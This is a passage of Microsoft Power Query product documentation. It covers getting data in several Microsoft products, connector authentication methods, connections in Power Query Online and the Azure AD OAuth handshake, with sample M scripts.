
Power Query documentation


Power Query is the data connectivity and data preparation technology that enables end
users to seamlessly import and reshape data from within a wide range of Microsoft
products, including Excel, Power BI, Analysis Services, Dataverse, and more.

Power Query Overview

OVERVIEW

What is Power Query?

What are dataflows?

Using Power Query

HOW-TO GUIDE

Use Power Query

Get data

Transform data

Working with dataflows

CONCEPT

Create and use dataflows in the Power Platform

Dataflow licenses

Dataflow best practices

Advanced Power Query articles

CONCEPT

Query folding
Query diagnostics

Error handling

Develop your custom connector

HOW-TO GUIDE

Custom connector development

Custom connector certification

Reference content

REFERENCE

Connectors in Power Query

M language reference
What is Power Query?
Article • 06/28/2023

Power Query is a data transformation and data preparation engine. Power Query comes
with a graphical interface for getting data from sources and a Power Query Editor for
applying transformations. Because the engine is available in many products and services,
the destination where the data will be stored depends on where Power Query was used.
Using Power Query, you can perform the extract, transform, and load (ETL) processing of
data.

How Power Query helps with data acquisition


Business users spend up to 80 percent of their time on data preparation, which delays
the work of analysis and decision-making. Several challenges contribute to this situation,
and Power Query helps address many of them.

Existing challenge: Finding and connecting to data is too difficult.
How Power Query helps: Power Query enables connectivity to a wide range of data sources, including data of all sizes and shapes.

Existing challenge: Experiences for data connectivity are too fragmented.
How Power Query helps: Consistency of experience, and parity of query capabilities over all data sources.

Existing challenge: Data often needs to be reshaped before consumption.
How Power Query helps: Highly interactive and intuitive experience for rapidly and iteratively building queries over any data source, of any size.

Existing challenge: Any shaping is one-off and not repeatable.
How Power Query helps: When using Power Query to access and transform data, you define a repeatable process (query) that can be easily refreshed in the future to get up-to-date data. In the event that you need to modify the process or query to account for underlying data or schema changes, you can use the same interactive and intuitive experience you used when you initially defined the query.

Existing challenge: Volume (data sizes), velocity (rate of change), and variety (breadth of data sources and data shapes).
How Power Query helps: Power Query offers the ability to work against a subset of the entire dataset to define the required data transformations, allowing you to easily filter down and transform your data to a manageable size. Power Query queries can be refreshed manually or by taking advantage of scheduled refresh capabilities in specific products (such as Power BI) or even programmatically (by using the Excel object model). Because Power Query provides connectivity to hundreds of data sources and over 350 different types of data transformations for each of these sources, you can work with data from any source and in any shape.

Power Query experiences


The Power Query user experience is provided through the Power Query Editor user
interface. The goal of this interface is to help you apply the transformations you need
simply by interacting with a user-friendly set of ribbons, menus, buttons, and other
interactive components.

The Power Query Editor is the primary data preparation experience, where you can
connect to a wide range of data sources and apply hundreds of different data
transformations by previewing data and selecting transformations from the UI. These
data transformation capabilities are common across all data sources, whatever the
underlying data source limitations.

When you create a new transformation step by interacting with the components of the
Power Query interface, Power Query automatically creates the M code required to do
the transformation so you don't need to write any code.

Currently, two Power Query experiences are available:

Power Query Online—Found in integrations such as Power BI dataflows, Microsoft
Power Platform dataflows, Azure Data Factory wrangling dataflows, and many
more that provide the experience through an online webpage.
Power Query for Desktop—Found in integrations such as Power Query for Excel
and Power BI Desktop.

Note

Although two Power Query experiences exist, they both provide almost the same
user experience in every scenario.

Transformations
The transformation engine in Power Query includes many prebuilt transformation
functions that can be used through the graphical interface of the Power Query Editor.
These transformations can be as simple as removing a column or filtering rows, or as
common as using the first row as a table header. There are also advanced
transformation options such as merge, append, group by, pivot, and unpivot.

All these transformations are made possible by choosing the transformation option in
the menu, and then applying the options required for that transformation. The following
illustration shows a few of the transformations available in Power Query Editor.

More information: Quickstart: Using Power Query in Power BI
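To make this concrete, here's a minimal sketch of the kind of M script the editor generates for a few common steps. The file path and the column names (Region, InternalId) are made-up examples for illustration, not taken from the product documentation:

let
    Source = Csv.Document(File.Contents("C:\Data\Sales.csv"), [Delimiter = ","]),
    // Use the first row as the table header
    #"Promoted Headers" = Table.PromoteHeaders(Source, [PromoteAllScalars = true]),
    // Keep only rows for one region (hypothetical column name)
    #"Filtered Rows" = Table.SelectRows(#"Promoted Headers", each [Region] = "West"),
    // Remove a column that isn't needed downstream
    #"Removed Columns" = Table.RemoveColumns(#"Filtered Rows", {"InternalId"})
in
    #"Removed Columns"

Each step in the applied steps pane corresponds to one of these variable assignments, which is why reordering or deleting steps in the UI edits the script for you.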

Dataflows
Power Query can be used in many products, such as Power BI and Excel. However, using
Power Query within a product limits its usage to only that specific product. Dataflows
are a product-agnostic service version of the Power Query experience that runs in the
cloud. Using dataflows, you can get data and transform data in the same way, but
instead of sending the output to Power BI or Excel, you can store the output in other
storage options such as Dataverse or Azure Data Lake Storage. This way, you can use the
output of dataflows in other products and services.

More information: What are dataflows?

Power Query M formula language


In any data transformation scenario, there are some transformations that can't be done
in the best way by using the graphical editor. Some of these transformations might
require special configurations and settings that the graphical interface doesn't currently
support. The Power Query engine uses a scripting language behind the scenes for all
Power Query transformations: the Power Query M formula language, also known as M.

The M language is the data transformation language of Power Query. Anything that
happens in the query is ultimately written in M. If you want to do advanced
transformations using the Power Query engine, you can use the Advanced Editor to
access the script of the query and modify it as you want. If you find that the user
interface functions and transformations won't perform the exact changes you need, use
the Advanced Editor and the M language to fine-tune your functions and
transformations.

Power Query M

let
    Source = Exchange.Contents("[email protected]"),
    Mail1 = Source{[Name="Mail"]}[Data],
    #"Expanded Sender" = Table.ExpandRecordColumn(Mail1, "Sender", {"Name"}, {"Name"}),
    #"Filtered Rows" = Table.SelectRows(#"Expanded Sender", each ([HasAttachments] = true)),
    #"Filtered Rows1" = Table.SelectRows(#"Filtered Rows", each ([Subject] = "sample files for email PQ test") and ([Folder Path] = "\Inbox\")),
    #"Removed Other Columns" = Table.SelectColumns(#"Filtered Rows1", {"Attachments"}),
    #"Expanded Attachments" = Table.ExpandTableColumn(#"Removed Other Columns", "Attachments", {"Name", "AttachmentContent"}, {"Name", "AttachmentContent"}),
    #"Filtered Hidden Files1" = Table.SelectRows(#"Expanded Attachments", each [Attributes]?[Hidden]? <> true),
    #"Invoke Custom Function1" = Table.AddColumn(#"Filtered Hidden Files1", "Transform File from Mail", each #"Transform File from Mail"([AttachmentContent])),
    #"Removed Other Columns1" = Table.SelectColumns(#"Invoke Custom Function1", {"Transform File from Mail"}),
    #"Expanded Table Column1" = Table.ExpandTableColumn(#"Removed Other Columns1", "Transform File from Mail", Table.ColumnNames(#"Transform File from Mail"(#"Sample File"))),
    #"Changed Type" = Table.TransformColumnTypes(#"Expanded Table Column1", {{"Column1", type text}, {"Column2", type text}, {"Column3", type text}, {"Column4", type text}, {"Column5", type text}, {"Column6", type text}, {"Column7", type text}, {"Column8", type text}, {"Column9", type text}, {"Column10", type text}})
in
    #"Changed Type"

More information: Power Query M formula language

Where can you use Power Query?


The following table lists Microsoft products and services where Power Query can be
found.

Product                            M engine (1)   Power Query Desktop (2)   Power Query Online (3)   Dataflows (4)

Excel for Windows                  Yes            Yes                       No                       No
Excel for Mac                      Yes            Yes                       No                       No
Power BI                           Yes            Yes                       Yes                      Yes
Power Apps                         Yes            No                        Yes                      Yes
Power Automate                     Yes            No                        Yes                      No
Power BI Report Server             Yes            Yes                       No                       No
Azure Data Factory                 Yes            No                        Yes                      Yes
Data Factory in Microsoft Fabric   Yes            No                        Yes                      Yes
SQL Server Integration Services    Yes            No                        No                       No
SQL Server Analysis Services       Yes            Yes                       No                       No
Dynamics 365 Customer Insights     Yes            No                        Yes                      Yes

(1) M engine: The underlying query execution engine that runs queries expressed in the Power Query formula language ("M").

(2) Power Query Desktop: The Power Query experience found in desktop applications.

(3) Power Query Online: The Power Query experience found in web browser applications.

(4) Dataflows: Power Query as a service that runs in the cloud and is product-agnostic. The stored result can be used in other applications and services.

See also
Data sources in Power Query
Getting data
Power Query quickstart
Shape and combine data using Power Query
What are dataflows
Getting data overview
Article • 04/10/2023

Power Query can connect to many different data sources so you can work with the data
you need. This article walks you through the steps for bringing in data to Power Query
either in Power Query Desktop or Power Query Online.

Connecting to a data source with Power Query follows a standard set of stages before
landing the data at a destination. This article describes each of these stages.

Important

In some cases, a connector might have all stages of the get data experience, and in
other cases a connector might have just a few of them. For more information about
the experience of a specific connector, go to the documentation available for the
specific connector by searching on the Connectors in Power Query article.

Power Query Desktop experience


The stages for getting data in the Power Query Desktop experiences are:

1. Connection settings

2. Authentication

3. Data preview

4. Query destination

1. Connection settings
Most connectors initially require at least one parameter to initialize a connection to the
data source. For example, the SQL Server connector requires at least the host name to
establish a connection to the SQL Server database.
In comparison, when trying to connect to an Excel file, Power Query requires that you
use the file path to find the file you want to connect to.

The connector parameters are commonly used to establish a connection to a data
source, and they—in conjunction with the connector used—define what's called a data
source path.
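As a rough illustration (the server and database names below are hypothetical), the same idea shows up in M: the arguments you pass to a connector function are the connection parameters that, together with the connector itself, make up the data source path.

let
    // Connector (Sql.Database) plus its parameters (host name, database) define the data source path
    Source = Sql.Database("sqlserver.contoso.com", "AdventureWorks")
in
    Source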

Note

Some connectors don't require you to enter any parameters at all. These are called
singleton connectors and will only have one data source path available per
environment. Some examples are Adobe Analytics, MailChimp, and Google
Analytics.

2. Authentication
Every single connection that's made in Power Query has to be authenticated. The
authentication methods vary from connector to connector, and some connectors might
offer multiple methods of authentication.

The currently available methods of authentication for Power Query are:

Anonymous: Commonly used when connecting to a data source that doesn't require
user authentication, such as a webpage or a file available over public HTTP.
Basic: A username and password sent in base64 encoding are accepted for
authentication.
API Key: A single API key is accepted for authentication.
Organizational account or Microsoft account: This method is also known as
OAuth 2.0.
Windows: Can be implicit or explicit.
Database: This is only available in some database connectors.

For example, the available authentication methods for the SQL Server database
connector are Windows, Database, and Microsoft account.

3. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.

Depending on the connector that you're using, you can preview data by using either:

Navigator window
Table preview dialog box

Navigator window (navigation table)


The Navigator window consists of two main sections:

The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.

Note

For Power Query in Excel, select the Select multiple items option from the
upper-left corner of the navigation window to select more than one object at
a time in the object selection pane.
Note

The list of objects in Power Query Desktop is limited to 10,000 items. This limit
does not exist in Power Query Online. For a workaround in Power Query
Desktop, see Object limitation workaround.

The data preview pane on the right side of the window shows a preview of the
data from the object you selected.

Object limitation workaround

There’s a fixed limit of 10,000 objects in the Navigator in Power Query Desktop. This
limit doesn’t occur in Power Query Online. Eventually, the Power Query Online UI will
replace the one in the desktop.

In the interim, you can use the following workaround:

1. Right-click on the root node of the Navigator, and then select Transform Data.
2. Power Query Editor then opens with the full navigation table in the table preview
area. This view doesn't have a limit on the number of objects, and you can use
filters or any other Power Query transforms to explore the list and find the rows
you want (for example, based on the Name column).

3. Upon finding the item you want, you can get at the contents by selecting the data
link (such as the Table link in the following image).

Table preview dialog box


The table preview dialog box consists of only one section for the data preview. An
example of a connector that provides this experience and window is the Folder
connector.

4. Query destination
This is the stage in which you specify where to load the query. The options vary from
integration to integration, but the one option that's always available is loading data to
the Power Query editor to further transform and enrich the query.
Power Query Online experience
The stages for getting data in Power Query Online are:

1. Connection settings and Authentication

2. Data preview

3. Query editor

1. Connection settings and authentication


In the Power Query Online experience, you begin with the Connect to data source page
where you enter values in two distinct sections:

Connection settings

Connection credentials

Connection settings
In the connection settings section, you define the information needed to establish a
connection to your data source. Depending on your connector, that could be the name
of the server, the name of a database, a folder path, a file path, or other information
required by the connector to establish a connection to your data source. Some
connectors also enable specific subsections or advanced options to give you more
control and options when connecting to your data source.
Connection credentials
The first time that you use Power Query to connect to a specific data source, you're
required to create a new connection associated with that data source. A connection is
the full definition of the gateway, credentials, privacy levels, and other connector-
specific fields that make up the connection credentials required to establish a
connection to your data source.

Note

Some connectors offer specific fields inside the connection credentials section to
enable or define any sort of security related to the connection that needs to be
established. For example, the SQL Server connector offers the Use Encrypted
Connection field.
The primary pieces of information required by all connectors to define a connection are:

Connection name: This is the name that you can define to uniquely identify your
connections. Note that you can't duplicate the name of a connection in your
environment.
Data gateway: If your data source requires a data gateway, select the gateway
using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, as well as fields where you enter your credentials. For this example, the
Windows authentication kind has been selected and you can see the Username
and Password fields that need to be filled in to establish a connection.
Privacy level: You can define the privacy level for your data source to be either
None, Private, Organizational, or Public.
Note

To learn more about what data gateways are and how to register a new gateway for
your environment or tenant, go to Using on-premises data gateway.

Important

Some Power Query integrations don't currently enable a defined connection or a
privacy level. But, all Power Query Online experiences do provide a way to define
the data gateway, authentication kind, and the credentials needed to establish a
connection with your data source.

Once you've defined a connection in Power Query Online, you can reuse the same
connection later on without reentering all this information again. The Connection field
offers a dropdown menu where you select your already defined connections. Once
you've selected your already defined connection, you don't need to enter any other
details before selecting Next.

After you select a connection from this menu, you can also make changes to the
credentials, privacy level, and other connector-specific fields for your data source in your
project. Select Edit connection, and then change any of the provided fields.
2. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.

Depending on the connector that you're using, you can preview data by using either:

Navigator window
Table preview dialog box

Navigator window (navigation table) in Power Query Online


The Navigator window consists of two main sections:

The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.

The data preview pane on the right side of the window shows a preview of the
data from the object you selected.

Table preview dialog box in Power Query Online


The table preview dialog box consists of only one section for the data preview. An
example of a connector that provides this experience and window is the Folder
connector.

3. Query editor
For Power Query Online, you're required to load the data into the Power Query editor
where you can further transform and enrich the query if you choose to do so.

Additional information
To better understand how to get data using the different product integrations of Power
Query, go to Where to get data.
Where to get data
Article • 07/28/2023

Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides basic steps for getting data from each of the
Microsoft products that include Power Query.

Note

Each of these Power Query get data experiences contains a different feature set.
More information: Where can you use Power Query?

Get data in Power BI Desktop


The procedures for where to start getting data in Power BI Desktop are described in
Data sources in Power BI Desktop.

In Power BI Desktop, you can also directly select an Excel worksheet, a Power BI dataset,
a SQL Server database, or Dataverse data without using the Get data option. You can
also enter data directly in a table, or select from a data source that was recently used.

Get data in Excel (Windows or Mac)


To get data in Excel for Windows or Excel for Mac:

1. From the Data ribbon, select Get Data.

2. Scroll through the category selections in the get data context menu, and select the
connector you want to use.
You'll then be asked to fill out information that's required for you to access the data. Go
to the individual connector articles for more information about this required
information.

In Excel, you can also directly select Text/CSV, Web, and Excel worksheet data without
using the Get Data option. You can also select from a data source that was recently used
and from existing connections or tables.

Note

Not all Excel versions support all of the same Power Query connectors. For a
complete list of the Power Query connectors supported by all versions of Excel for
Windows and Excel for Mac, go to Power Query data sources in Excel versions .
Get data in Power BI service
To get data in Power BI service:

1. On the left side of Power BI service, select Workspaces (but not My Workspace).

2. From the Workspace context menu, select the workspace you want to use.

3. From the workspace (in this example, TestWorkspace01), select the context menu
next to +New.

4. From the New context menu, select Dataflow.

5. From Define new tables, select Add new tables.

6. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right-hand side of the connector to see a list
of all the connectors available in Power BI service.

7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

Get data in Power Apps


There are several places in Power Apps where you can get data, either by importing data
to a table or by creating a dataflow.

To import data to a new table in Power Apps:

1. On the left side of Power Apps, select Dataverse > Tables.


2. In the Tables pane, at the top left, select Import > Import data.

You can also choose to get data directly from an Excel worksheet without using the
Import data option.

3. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right-hand side of the connector to see a list
of all the connectors available in Power Apps.

4. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

To import data to an existing table in Power Apps:

1. On the left side of Power Apps, select Dataverse > Tables.

2. In the Tables pane, either:

Select a table in the Tables pane that you want to import data to, and then
select Import > Import data.
Open the table to its individual pane, and then select Import > Import data.

In either case, you can also choose to get data from an Excel worksheet without
using the Import data option.

3. Select the connector from the list of data sources.

To get data in Power Apps when creating a dataflow:

1. On the left side of Power Apps, select Dataverse > Dataflows.


2. If a dataflow already exists:
a. Double-click on the dataflow.
b. From the Power Query editor, select Get data.
c. Select the connector from the list of data sources.

3. If no dataflow exists and you want to create a new dataflow:

a. Select New dataflow.

b. In the New dataflow dialog box, enter a name for your new dataflow.

c. Select Create.

d. Select the connector from the list of data sources.

Get data in Dynamics 365 Customer Insights


To get data in Customer Insights:

1. On the left side of Customer Insights, select Data > Data sources.

2. In the Data sources pane, select Add data source.

3. In Choose your import method, choose Microsoft Power Query.

4. In Save data source as, enter a name for your data source.

5. Select Next.

6. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right-hand side of the connector to see a list
of all the connectors available in Customer Insights.

7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

Get data from Data Factory in Microsoft Fabric (Preview)
To get data in Data Factory:

1. On the left side of Data Factory, select Workspaces (but not My Workspace).

2. From your Data Factory workspace, select New > Dataflow Gen2 (Preview) to
create a new dataflow.

3. In Power Query, either select Get data in the ribbon or select Get data from
another source in the current view.

4. In the Choose data source page, use Search to search for the name of the
connector, or select View more on the right-hand side of the connector to see a list
of all the connectors available in Data Factory.

5. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.

Get data in Analysis Services


With Analysis Services, a solution is developed in Visual Studio with the Analysis Services
projects extension. The solution is then deployed to SQL Server Analysis Services, Azure
Analysis Services, or a Power BI Premium workspace.

The Analysis Services documentation contains the following information that describes
the process for getting data:
To set up a Visual Studio solution with the Analysis Services projects extension:
Create a tabular model project

To get data: Get data

Get data in Power Automate


There are a couple of places in Power Automate where you can get data, either by
importing tables or in process advisor.

To get data by importing tables:

1. On the left side of Power Automate, select Data > Tables. At this point, a new tab
with Power Apps will open in your browser.

2. In the Power Apps tab, follow the instructions for importing data to either a new
table or to an existing table in the Power Apps section.

For information about how to get data in process advisor, go to Connect to a data
source.

Get data in Azure Data Factory


Azure Data Factory doesn't use the same Power Query get data interface as the other
apps described in this article. Instead, Azure Data Factory uses its own built-in
functionality to import data.

However, Azure Data Factory does use Power Query to transform data in data wrangling.
The following Azure Data Factory articles describe how to use Power Query for data
wrangling:

What is data wrangling?


Power Query activity in Azure Data Factory
Prepare data with data wrangling

Get data in SQL Server Integration Services


SQL Server Integration Services (SSIS) doesn't use the same Power Query get data
interface as the other apps described in this article. Instead, SSIS uses its own built-in
functionality to import data.
For information on installing, configuring, and using the Power Query Source for SSIS,
go to Power Query Source.
Get data experience
Article • 09/22/2023

Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides an explanation of the different modules in the
modern get data experience.

Note

Each of these Power Query get data experiences contains a different feature set.
More information: Where can you use Power Query?

Modern get data experience


The get data experience allows you to discover and connect to your data.

The procedures for where to start getting data in Power BI Desktop are described in
Data sources in Power BI Desktop.

The new modular experience in Power Query Online is separated into different modules
located on the left side navigation bar. These modules include:

Home (all)
Templates (Power BI service only)
OneLake Data Hub (Fabric only)
New (all)
Upload (all)
Blank Table (all)
Blank Query (all)

Home
The home page acts as a summary of all the modules and presents you with different
options to expedite the process and get you closer to your data. Typically, this module
contains any existing data sources and gives you the option to use a new data source,
table, and upload files. From the home page, you can select View more on the right side
of the New sources and OneLake data hub sections to visit those modules.

Templates
A dataflow template provides a predefined set of entities and field mappings to enable
flow of data from your source to the destination, in the Common Data Model. A
dataflow template commoditizes the movement of data, which in turn reduces overall
burden and cost for a business user. It provides you with a head start to ingest data
wherein you don’t need to worry about knowing and mapping the source and
destination entities and fields—we do it for you, through dataflow templates. For more
information about templates, go to Introducing dataflow templates; A quick and
efficient way to build your sales leaderboard and get visibility over your sales pipeline .

OneLake data hub


The OneLake data hub makes it easy to find, explore, and use the Fabric data items in
your organization that you have access to. It provides information about the items and
entry points for working with them. For more information on the OneLake data hub, go
to OneLake Data Hub.

New
The new module provides a full list of connectors that you can select from. On this page,
you can search for a connector across all categories by using the search bar at the top of
page. You can also navigate across the categories to find a specific connector to
integrate with. Selecting a connector here opens the connection settings window, which
begins the process of connecting. For more information on using connectors, go to
Getting data overview.

Upload
The Upload module lets you upload your files directly. The following connectors support
this capability:

Excel
JSON
PDF
Text/CSV
XML

This module is an extension of this capability and lets you select the browse button to
upload a local file, or even drag and drop a file. For more information on uploading files,
go to Upload a file.

Blank table
The Blank table module provides a quick start in creating a table in a dataflow.

Blank query
The Blank query module lets you write or paste your own M script to create a new
query.
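For example, a minimal script you could paste into a blank query (the values are invented for illustration) to produce a small table:

let
    // Build a small in-memory table from literal values
    Source = #table(
        type table [Product = text, Units = number],
        {{"Widget", 10}, {"Gadget", 25}}
    )
in
    Source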
Authentication with a data source
Article • 02/17/2023

When you attempt to connect to a data source using a new connector for the first time,
you might be asked to select the authentication method to use when accessing the
data. After you've selected the authentication method, you won't be asked to select an
authentication method again for that connector when using the specified connection parameters.
However, if you need to change the authentication method later, you can do so.

Select an authentication method


Different connectors show different authentication methods. For example, the OData
Feed connector in Power BI Desktop and Excel displays the following authentication
method dialog box.

If you're using a connector from an online app, such as the Power BI service or Power
Apps, you'll see an authentication method dialog box for the OData Feed connector that
looks something like the following image.
As you can see, a different selection of authentication methods is presented from an
online app. Also, some connectors might ask you to enter the name of an on-premises
data gateway to be able to connect to your data.

Set the level of the authentication method


In connectors that require you to enter a URL, you'll be asked to select the level to which
the authentication method will be applied. For example, if you select the Web connector
with a URL of https://contoso.com/2020data/List_of_countries_and_capitals , the
default level setting for your authentication method will be https://contoso.com .

The level you select for the authentication method you chose for this connector
determines what part of a URL will have the authentication method applied to it. If you
select the top-level web address, the authentication method you select for this
connector will be used for that URL address or any subaddress within that address.
However, you might not want to set the top-level address to a specific authentication
method because different subaddresses can require different authentication methods.
One example might be if you were accessing two separate folders of a single SharePoint
site and wanted to use different Microsoft accounts to access each one.

After you've set the authentication method for a connector's specific address, you won't
need to select the authentication method for that connector using that URL address or
any subaddress again. For example, let's say you select the https://contoso.com/
address as the level you want the Web connector URL settings to apply to. Whenever
you use a Web connector to access any webpage that begins with this address, you
won't be required to select the authentication method again.

Change the authentication method


In some cases, you might need to change the authentication method you use in a
connector to access a specific data source.

To edit the authentication method in Power BI Desktop or Excel

1. Do one of the following:

In Power BI Desktop, on the File tab, select Options and settings > Data
source settings.
In Excel, on the Data tab, select Get Data > Data Source Settings.

2. In the Data source settings dialog box, select Global permissions, choose the
website where you want to change the permission setting, and then select Edit
Permissions.

3. In the Edit Permissions dialog box, under Credentials, select Edit.


4. Change the credentials to the type required by the website, select Save, and then
select OK.

You can also delete the credentials for a particular website in step 3 by selecting Clear
Permissions for a selected website, or by selecting Clear All Permissions for all of the
listed websites.

To edit the authentication method in online services, such as for dataflows in the
Power BI service and Microsoft Power Platform

1. Select the connector, and then select Edit connection.

2. Make the required changes, and then select Next.


Connecting with Azure Active Directory using
the Web and OData connectors
When connecting to data sources and services that require authentication through
OAuth or Azure Active Directory-based authentication, in certain cases where the service
is configured correctly, you can use the built-in Web or OData connectors to
authenticate and connect to data without requiring a service-specific or custom
connector.

This section outlines connection symptoms when the service isn't configured properly. It
also provides information on how Power Query interacts with the service when it's
properly configured.

Symptoms when the service isn't configured properly


If you run into the error We were unable to connect because this credential type isn’t
supported for this resource. Please choose another credential type, this error means
that your service doesn't support the authentication type.

One example of this is the Northwind OData service.

1. Enter the Northwind endpoint in the "Get Data" experience using the OData
connector.

2. Select OK to enter the authentication experience. Normally, because Northwind
isn’t an authenticated service, you would just use Anonymous. To demonstrate lack
of support for Azure Active Directory, choose Organizational account, and then
select Sign in.
3. You'll encounter the error, indicating that OAuth or Azure Active Directory
authentication isn't supported in the service.

Supported workflow
One example of a supported service working properly with OAuth is CRM, for example,
https://*.crm.dynamics.com/api/data/v8.2 .

1. Enter the URL in the "Get Data" experience using the OData connector.
2. Select Organizational Account, and then select Sign-in to proceed to connect
using OAuth.

3. The request succeeds and the OAuth flow continues to allow you to authenticate
successfully.
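In M terms, the query behind this walkthrough is roughly the following sketch (the organization name in the CRM URL is a placeholder, not a working endpoint):

let
    // OData feed for a Dynamics 365 (CRM) Web API endpoint; the organization name is a placeholder
    Source = OData.Feed("https://yourorg.crm.dynamics.com/api/data/v8.2")
in
    Source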

When you select Sign-in in Step 2 above, Power Query sends a request to the provided
URL endpoint with an Authorization header with an empty bearer token.

GET https://*.crm.dynamics.com/api/data/v8.2 HTTP/1.1
Authorization: Bearer
User-Agent: Microsoft.Data.Mashup (https://go.microsoft.com/fwlink/?LinkID=304225)
Host: pbi.crm.dynamics.com
Connection: Keep-Alive

The service is then expected to respond with a 401 response with a WWW-Authenticate
header indicating the Azure AD authorization URI to use. This response should include
the tenant to sign into, or /common/ if the resource isn’t associated with a specific
tenant.
HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Type: text/html
Server:
WWW-Authenticate: Bearer authorization_uri=https://login.microsoftonline.com/3df2eaf6-33d0-4a10-8ce8-7e596000ebe7/oauth2/authorize
Date: Wed, 15 Aug 2018 15:02:04 GMT
Content-Length: 49

Power Query can then initiate the OAuth flow against the authorization_uri. Power
Query requests an Azure AD Resource or Audience value equal to the domain of the
URL being requested. This value would be the value you use for your Azure Application
ID URL value in your API/service registration. For example, if accessing
https://api.myservice.com/path/to/data/api , Power Query would expect your

Application ID URL value to be equal to https://api.myservice.com .

The following Azure Active Directory client IDs are used by Power Query. You might
need to explicitly allow these client IDs to access your service and API, depending on
your overall Azure Active Directory settings.

Client ID                              Title                           Description

a672d62c-fc7b-4e81-a576-e60dc46e951d   Power Query for Excel           Public client, used in Power BI Desktop and Gateway.

b52893c8-bc2e-47fc-918b-77022b299bbc   Power BI Data Refresh           Confidential client, used in Power BI service.

7ab7862c-4c57-491e-8a45-d52a7e023983   Power Apps and Power Automate   Confidential client, used in Power Apps and Power Automate.

Go to step 8 of Add a scope for more details.

If you need more control over the OAuth flow (for example, if your service must respond
with a 302 rather than a 401 ), or if your application’s Application ID URL or Azure AD
Resource value don't match the URL of your service, then you’d need to use a custom
connector. For more information about using our built-in Azure AD flow, go to Azure
Active Directory authentication.
Connections and authentication in Power Query Online
Article • 02/17/2023

In Power Query Online, a connection refers to the unique identifier and associated
credentials used to establish a connection to a particular data source. One convenient
feature of connections in Power Query is that you can create multiple connections
against the same data source with different credentials.

There are two categories of connections:

Connection category name   Description

Cloud                      Any connection for a data source that's cloud-based and doesn't use a gateway.

On-premises                Any connection that requires a gateway.

Creating a connection
During the get data experience in Power Query Online, you'll find a dialog where you
enter information to create and establish a connection to your data source. The process
is standard for all connectors in Power Query, but some connectors might require more
information in order to create a connection.

Creating a cloud connection


Using the Azure SQL Server database connector as an example, you can enter the
connector settings to establish a connection. For the Azure SQL Server connector, the
required setting is just the server name, but you can also enter the name of the
database and select any other advanced options available for the connector.

After entering the values for the connector settings in the Connection settings section,
you can proceed with the Connection credentials section. In this section, you can create
a connection specific to the connection settings you previously entered.
The following table contains the fields and values used in the Connection settings
section.

Field: Connection Name
Description: The name you can enter for your new connection.
Sample value: Sample Connection

Field: Data Gateway
Description: An optional field that lets you bind a gateway to your connection. For cloud connections, there's no gateway binding to the connection.
Sample value: none

Field: Authentication Kind
Description: The authentication kind you select to use that's supported by the connector.
Sample value: Organizational account

Field: Credentials
Description: Depending on the authentication kind you select, a contextual set of fields is available to input your credentials, a button to launch an OAuth2 flow, or even no fields at all for an authentication kind such as Anonymous.
Sample value: Derived from the OAuth2 flow, but shown as a Sign in button in the image
Note

By default, the field for the connection name tries to provide a default name when
you create a connection using the information from the connection settings.

After finishing the Connection settings section, you select the Next button to move
forward in the get data experience.

Tip

Some connectors provide an auto sign in experience. To learn more about this
feature, go to auto sign in.

Creating an on-premises connection


As an alternative, you can also bind a gateway to your connection, which converts your
connection from a cloud connection to an on-premises connection.

Note

To create a gateway you can read the article on using an on-premises data
gateway in dataflows.

Using a local SQL Server database as an example, you enter the connector settings to
establish a connection. For the SQL Server connector, the required setting is just the
server name, but you can also enter the name of the database and select any other
advanced options available for the connector. For demonstration purposes, both the
server name and database have been entered.
After entering the values for the connector in Connection settings, you can proceed
with the Connection credentials section. In this section, you can create a connection
specific to the connection settings you previously entered.

The following table contains the fields and values used in the Connection settings
section.

Field: Connection Name
Description: The name you can enter for your new connection.
Sample value: localhost;AdventureWorks2019

Field: Data Gateway
Description: An optional field that lets you bind a gateway to your connection.
Sample value: Mike Test

Field: Authentication Kind
Description: The authentication kind you select to use that's supported by the connector.
Sample value: Basic

Field: Credentials
Description: Depending on the authentication kind selected, a contextual set of fields is available to input your credentials, a button to launch an OAuth2 flow, or even no fields at all for an authentication kind such as Anonymous.
Sample value: Username and password

After finishing the Connection settings section, you select the Next button to move
forward within the get data experience.

Components of a connection
Each connection is made up of a set of components. The following table contains more
information for each component.

Component name: Data Source kind
Required or optional: Required
Description: The data source for which the connection is being established.
Sample: SQL Server, File, Folder, Azure Data Lake Storage

Component name: Data Source path
Required or optional: Required
Description: A string that represents the values or parameters used to establish a connection to your data source.
Sample: Server Name, Database Name

Component name: Authentication
Required or optional: Required
Description: Encompasses both the authentication method and the credentials used for authentication.
Sample: Windows, OAuth2, Anonymous

Component name: Gateway
Required or optional: Optional
Description: Used when a gateway is needed to establish the connection and execute any query evaluation.
Sample: Any gateway

Component name: Privacy level
Required or optional: Optional
Description: Establishes the security for each connection, which is taken into consideration when queries from different connections are combined.
Sample: None, Public, Organizational, Private

Important

Currently, the privacy level is set to None for any new connections created. When
you try to combine multiple data sources, a new dialog prompts you to define the
data privacy levels of the data sources that you want to combine.
Known connections
When Power Query recognizes a set of connection settings, it tries to look up in its
respective credentials storage to see if there's a connection that matches those settings
and, if so, automatically selects that connection.

To override this behavior, you can take either of the following two actions:

Display the dropdown menu to scan a list of available connections for the given
connection settings. You can then select the one that you'd like to use or create a
new one.
Select Edit connection to modify the existing connection or select Create new
connection from the dropdown menu to create a new named connection.
More resources
List of connectors in Power Query
On-premises data gateways documentation
Change the gateway used in a dataflow
Troubleshooting dataflow issues: Connection to the data source
Auto sign in for Azure Active Directory data sources
Article • 10/06/2022

The auto sign-in feature attempts to automatically sign you in as the current user when
connecting to data sources in Power Query that use Azure Active Directory as one of
